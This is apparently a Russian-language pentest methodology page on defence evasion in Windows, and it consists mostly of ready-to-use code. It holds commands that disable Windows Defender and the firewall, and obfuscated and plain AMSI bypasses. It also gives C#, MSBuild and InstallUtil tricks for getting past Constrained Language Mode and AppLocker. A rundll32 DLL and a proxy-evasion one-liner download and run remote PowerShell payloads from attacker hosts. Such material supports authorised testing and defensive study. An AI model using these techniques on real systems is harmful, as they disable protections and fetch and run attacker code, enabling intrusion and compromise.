Обход защитных мер
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Закрепите текущий уровень доступа и соберите контекст (ОС, сеть, домен).
- Минимизируйте шум: избегайте лишних действий вне scope.
- Документируйте команды и вывод для отчёта.
- Ниже — заголовки и примеры команд на английском.
Методика
Disable AV & Firewall
# Alternative 1
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true
# Alternative 2
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Antimalware Scan Interface (AMSI)
# Alternative 1
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Alternative 2
(([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)
Constrained Language Enabled (CLM)
Alternative 1 - Metasploit
meterpreter> load powershell
meterpreter> powershell_shell
Alternative 2 - Csharp
// Console APP (.NET Framework)
using System;
// right-click the References folder in the Solution Explorer and select Add Reference
// Click on Assemblies menu (left-hand side) and look for System.Configuration.Install
using System.Configuration.Install;
// right-click the References folder in the Solution Explorer and select Add Reference
// select the Browse… button at the bottom of the window and navigate to
// C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
String cmd = "(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1') | IEX";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}
AppLocker
Allowed store directories
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
Alternative 1 - InstallUtil
// Console APP (.NET Framework)
using System;
// right-click the References folder in the Solution Explorer and select Add Reference
// Click on Assemblies menu (left-hand side) and look for System.Configuration.Install
using System.Configuration.Install;
// right-click the References folder in the Solution Explorer and select Add Reference
// select the Browse… button at the bottom of the window and navigate to
// C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
// the Main method is not part of the application whitelisting, it can be used for other puposes, like bypassing AVs
Console.WriteLine("Totatlly useless");
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
<YOUR_MALICIOUS_CHSARP_CODE>
}
}
}
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\clm.exe
Alternative 2 - MSBuild
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
<YOUR_MALICIOUS_CHSARP_CODE>
]]>
</Code>
</Task>
</UsingTask>
</Project>
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\Tasks\\build.xml
Alternative 3 - DLL Bypass
PowerShell - CLM
//#include "pch.h"
#include <windows.h>
// Reference:
// https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain
// https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-entry-point-function
// https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
BOOL APIENTRY DllMain(
HMODULE hModule, // handle to DLL module (same as HINSTANCE)
DWORD fdwReason, // reason for calling function
LPVOID lpReserved // reserved
) {
STARTUPINFOA si = {
sizeof(STARTUPINFOA)
};
PROCESS_INFORMATION pi;
LPCSTR appCalc = "C:\\Windows\\System32\\calc.exe";
// Perform actions based on the reason for calling
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
// A process loads the DLL (initialize once for each new process)
// Return FALSE to fail DLL load
// Start a "calc.exe" child process
// if (!CreateProcessA(appCalc, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
// MessageBox(NULL, TEXT("CreateProcessA() failed\n") + GetLastError(), TEXT("Error"), MB_OK | MB_ICONINFORMATION);
// return FALSE;
// }
// MessageBox(NULL, TEXT("Hello, DLL is attached"), TEXT("Hi!"), MB_OK | MB_ICONINFORMATION);
return TRUE;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization
break;
case DLL_THREAD_DETACH:
// Thread exits normally
// Do thread-specific cleanup
break;
case DLL_PROCESS_DETACH:
// A process unloads the DLL
// Perform any necessary cleanup
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH
}
// Export function
//extern "C"
__declspec(dllexport) void psh() {
// MessageBox(NULL, TEXT("Hello from a DLL exported function"), TEXT("Hi!"), MB_OK | MB_ICONINFORMATION);
STARTUPINFOA si = {
sizeof(STARTUPINFOA)
};
PROCESS_INFORMATION pi;
LPCSTR appCmd = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -w hidden -nop -c IEX(new-object system.net.webclient).downloadstring('http://10.10.10.4/run.txt')";
// Start a "cmd.exe" child process
// if (!CreateProcessA(appCmd, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
if (!CreateProcessA(NULL, appCmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
MessageBox(NULL, TEXT("CreateProcessA() failed\n") + GetLastError(), TEXT("Error"), MB_OK | MB_ICONINFORMATION);
}
}
C:\Windows\Tasks> rundll32 testdll3.dll,psh
Powershell Proxy Evasion
$wc = new-object system.net.WebClient; $wc.proxy = $null; $wc.DownloadString("http:/<YOUR_IP>/shell.ps1")
Just Enough Administration (JEA)
function CommandName { whoami | out-host }